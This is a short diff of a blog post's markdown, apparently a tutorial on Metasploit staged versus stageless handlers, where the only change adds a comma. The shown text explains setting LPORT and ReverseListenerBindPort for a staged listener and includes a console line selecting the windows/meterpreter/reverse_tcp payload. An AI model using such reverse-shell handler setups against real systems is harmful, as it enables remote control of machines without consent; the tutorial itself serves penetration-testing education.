OJ/buffered.io-hugo/content/post/2016-10-05-staged-vs-stageless-handlers.markdown

 Next we create a staged listener, but we do the following:

 1. We leave `LPORT` set to `8000`, because this is what we want the transport configuration to contain.
-1. We set `ReverseListenerBindPort` to something different (`9000` in our example), as this forces the listener to bind to another port which we will point our staged payload at.
+1. We set `ReverseListenerBindPort` to something different (`9000` in our example), as this forces the listener to bind to another port, which we will point our staged payload at.

 ```
 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp